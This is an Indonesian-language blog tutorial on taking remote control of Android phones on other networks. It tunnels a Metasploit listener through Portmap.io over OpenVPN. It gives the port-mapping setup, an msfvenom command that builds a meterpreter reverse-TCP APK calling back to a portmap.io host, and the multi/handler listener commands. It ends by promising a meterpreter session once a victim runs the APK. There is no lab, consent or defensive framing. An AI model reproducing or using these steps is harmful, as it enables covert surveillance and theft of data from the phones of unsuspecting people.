Cara Hack / Retas Android Beda jaringan Menggunakan Portmap.io

Portmap.io adalah proxy server untuk membuat / membuka jaringan private melalui NAT atau firewall untuk menghubungkan localhost ke internet dengan tunnel yang aman. Cara kerjanya hampir sama seperti ngrok dan serveo atau bisa di bilang gabungan dari keduanya.

Tapi portmap.io ini mempunyai kelebihan yaitu ip yang di gunakan tidak berubah ubah sama halnya dengan serveo, Tetapi yang membedakan portmap.io ini dengan serveo adalah segi penggunaan. Kalau serveo kan satu dns di gunakan untuk semua orang, Sedangkan portmap.io ini tidak. Kita akan di berikan dns sendiri sama hasilnya dengan ngrok itu yang membedakannya.

bahan yang di butuhkan :
  • Portmap.io
  • Openvpn
  • Metasploit 
note : saya menjalankannya di kali linux. untuk user linux lain / termux juga bisa kok asal sudah terinstall bahan bahan di atas.

CARA MENDAFTAR PORTMAP.IO


Hal pertama kalian harus mendaftar dulu akun nya di portmap.io cara mendaftarnya cukup mudah kok. tinggal klik daftar / register, setelah itu isi data datanya dengan benar seperti ini.


setelah klik register tinggal cek email kamu dan klik link registrasi dari portmap.io dan akun kamu udah jadi. Sangat mudah sekali bukan hehehe. oke selanjutkan kita langsung membahas hack android beda jaringan menggunakan portmap.io ini sesuai judul artikel kali ini.

CARA MENGGUNAKAN PORTMAP.IO UNTUK HACK ANDROID BEDA JARINGAN


setelah daftar kita masuk ke akun portmap.io dan klik menu "Configuration" setelah itu kita buat ovpn nya dengan mengeklik "Create New Configuration" sepert ini.



Setelah itu akan muncul seperti ini dan tinggal isi nama dan ubah udp ke tcp setelah itu klik generate.



setelah di klik generate nanti akan muncul script ovpn kita di kolom tersebut seperti ini. dan jangan lupa untuk download file.ovpn nya dengan klik Download.



langkah selanjutnya tinggal kita buat file ovpn nya dengan mengklik create dan taraa 😁 file ovpn sudah jadi. 




Ngomong ngomong apa sih fungsi file.ovpn ini ? fungsi nya adalah biar kita bisa terhubung dengan portmap.io nya yang nanti di gunakan untuk hack andorid beda jaringan. 


Apa setelah jadi bisa langsung di gunakan ? Eiitsss, belum ini masih setengah perjalanan. masih ada yang perlu kita setting agar file.ovpn dari portmap.io ini bisa di gunakan. oke mari kita lanjutkan.
klik menu "MAPPING RULES" lalu buat baru dengan klik "New Rules". Kalau sudah muncul seperti di bawah ini, Tidak perlu merubah data yang lain cukup isi saja yang "Port on your PC"dengan port yang akan kamu gunakan untuk membuat listener backdoor nanti. Saya mengisi dengan port 4444.


lalu klik "createdan muncul seperti ini. jangan lupa save / copy yang bagian ini 

 tcp://script000kiddies000-31626.portmap.io:31626 => 4444  

nanti itu yang akan kita gunakan sebagai ip dan port membuat backdoornya .



semua settingan portmap.io nya sudah selesai tinggal kita lanjut ke step pembuatan backdoornya menggunakan portmap.io yang sudah kita siapkan. pastikan sudah terinstall "METASPLOIT" karena kita akan menggunakan tool itu nanti.


Oke sekarang, untuk terhubung ke vpn, ketik "openvpn <nama file konfigurasi yang telah Anda unduh> contoh :

 openvpnscript000kiddies000.pertama.ovpn

lalu tunggu hingga muncul tulisan "Initialization Sequence Complete" yang menandakan kamu sudah terhubung ke jaringan ovpn nya. Jangan Pernah tutup terminal yang ini nanti koneksi nya terputus.




selanjutnya kita buat dulu payload RAT android nya menggunakan perintah berikut :

msfvenom -p android/meterpreter/reverse_tcp LHOST=script000kiddies000-31626.portmap.ioLPORT=31626 R > /root/Desktop/nama.apk

untuk LHOST dan LPORT sesuaikan dengan yang disini tadi 

 tcp://script000kiddies000-31626.portmap.io:31626 => 4444  

Setelah pembuatan payload sukses, untuk menciptakan listener di Metasploit, ketik
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost 10.9.12.90

    isi sesuai yang di ifconfig tun0




    di saya tun0 ip nya 10.9.12.90
  • use lport 4444
    Ex: atur lport 4444 (Dalam kasus saya, saya memilih port 4444 untuk diteruskan dalam aturan pemetaan)
  • exploit

Sekarang, exploit akan berhasil diluncurkan dan Anda akan mendapatkan meterpreter setelah payload yang Anda buat telah dieksekusi oleh korban.  

  • Jika Anda memiliki komentar, silakan tinggalkan di kotak komentar di bawah dan bagikan artikel jika Anda suka

3 Komentar untuk "Cara Hack / Retas Android Beda jaringan Menggunakan Portmap.io"

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel